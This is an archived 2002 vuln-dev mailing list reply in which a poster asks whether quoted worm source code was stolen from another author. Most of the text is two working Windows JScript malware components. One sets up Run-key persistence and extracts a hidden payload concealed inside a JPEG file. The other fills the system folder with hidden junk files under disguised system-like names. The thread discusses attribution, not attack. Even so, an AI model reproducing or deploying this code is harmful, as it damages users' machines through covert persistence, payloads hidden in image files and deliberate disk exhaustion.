Does this help? http://yodacker.hypermart.net/resources/SDF/gdk07-sdf-doc_cod.htm -David > -----Original Message----- > From: Arturo "Buanzo" Busleiman [mailto:buanzoat_private] > Sent: Sunday, March 17, 2002 11:13 PM > To: vuln-devat_private > Subject: Stolen source? > > > Hi! > > Do you recognize this source code? Can you tell which is the > real/original > author? > > I explain: I am a member of the Raregazz Team, we produce (!) > series of > underground-related articles. On the 18th edition, a > non-member send us an > article which was half-stolen from another author (not well > known either > of them). Now, he is sending us another article, a > source-code explanation > for a worm. This source code makes me remember of someone else's... > > So, I would like to find: > > a) the original author or at least > b) know if this source is not an original (i.e is stolen) > > Thank you! > > var ob, ws, ws2, g, g2, t, yu, ly, f, f2; > ob = new ActiveXObject("Scripting.FileSystemObject"); > ws = WScript.CreateObject ("WScript.Shell"); > n = ob.GetSpecialFolder(1)+"\\"; > yu = ran(); > ly = n+yu+".js"; > mai(); > function mai(){ > ws2 = ws.RegRead("HKCU\\Control Panel\\Desktop\\MenuShowDelay"); > if (ws2 != "auto"){ > > ws.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersio > n\\Run\\"+yu, l > y, "REG_SZ"); > ws.RegWrite("HKCU\\Control Panel\\Desktop\\MenuShowDelay", > "auto", "REG_SZ"); > g = ob.GetFile("girl.jpg"); > f = g.OpenAsTextStream(1, -2); > g2 = f.ReadAll(); > g2 = g2.substring(31029, 32457); > t = ob.OpenTextFile(ly, 2, true); > t.Write(g2); > t.Close(); > f2 = ob.GetFile(ly); > f2.attributes = f2.attributes + 4; > } > } > > function ran(){ > rr = new Array(15); > rr[0] ="$mstask"; rr[1] ="$command"; rr[2] ="$explorer"; > rr[3] ="$alg"; rr[4] > ="$logon"; rr[5] ="$ie"; rr[6] ="$icq"; rr[7] ="$win"; rr[8] > ="$system"; rr[9] > ="$sys"; rr[10] ="$scanreg"; rr[11] ="$yahoo"; rr[12] > ="$msn"; rr[13] ="$clock > "; rr[14] ="$logger"; rr[15] ="$yl"; > var irr = rr[parseInt(Math.round(Math.random()*15))]; > return (irr); > } > > > /* second source code */ > > var ob, f, f2, t, t2, n, w, ry0, ry1; > ob = new ActiveXObject("Scripting.FileSystemObject"); > t = new Date(); > t2 = t.getHours()+t.getMinutes()+t.getSeconds(); > n = ob.GetSpecialFolder(1)+"\\"; > wrote(); > > function wrote(){ > ry0 = ran(); > ry1 = ran2(); > w = n+ry0+t2+ry1; > f = ob.OpenTextFile(w, 2, true); > for (q = 0; q < 1000; q++){rew();} > f.Close(); > f2 = ob.GetFile(w); > f2.attributes = f2.attributes + 4; > } > > function ran(){ > rr = new Array(15); > rr[0] ="mstask."; rr[1] ="command."; rr[2] ="explorer."; > rr[3] ="alg."; rr[4] = > "logon."; rr[5] ="ie."; rr[6] ="leeme."; rr[7] ="win."; rr[8] > ="system."; rr[9] > ="sys."; rr[10] ="scanreg."; rr[11] ="icq."; rr[12] ="msn."; > rr[13] ="clock."; > rr[14] ="logger."; rr[15] ="yl."; > var irr = rr[parseInt(Math.round(Math.random()*15))]; > return (irr); > } > > function ran2(){ > rr2 = new Array(15); > rr2[0] =".exe"; rr2[1] =".doc"; rr2[2] =".com"; rr2[3] > =".bat"; rr2[4] =".tmp"; > rr2[5] =".xls"; rr2[6] =".ini"; rr2[7] =".inf"; rr2[8] > =".vxd"; rr2[9] =".dll" > ; rr2[10] =".htm"; rr2[11] =".cpl"; rr2[12] =".sys"; rr2[13] > =".dat"; rr2[14] = > ".yl"; rr2[15] =".hex"; > var irr2 = rr2[parseInt(Math.round(Math.random()*15))]; > return (irr2); > } > > function rew(){ > > f.Write(":::: GusanoDisk Y v5.recover ::::"); > f.Write("Creado :: "+ t2); > f.WriteBlankLines(90); > for (q = 0; q < 900; q++){f.Write("GusanoDisk Y by HeX. > Gracias por sus > megabytes."); > } > } > >
This archive was generated by hypermail 2b30 : Mon Mar 18 2002 - 08:45:50 PST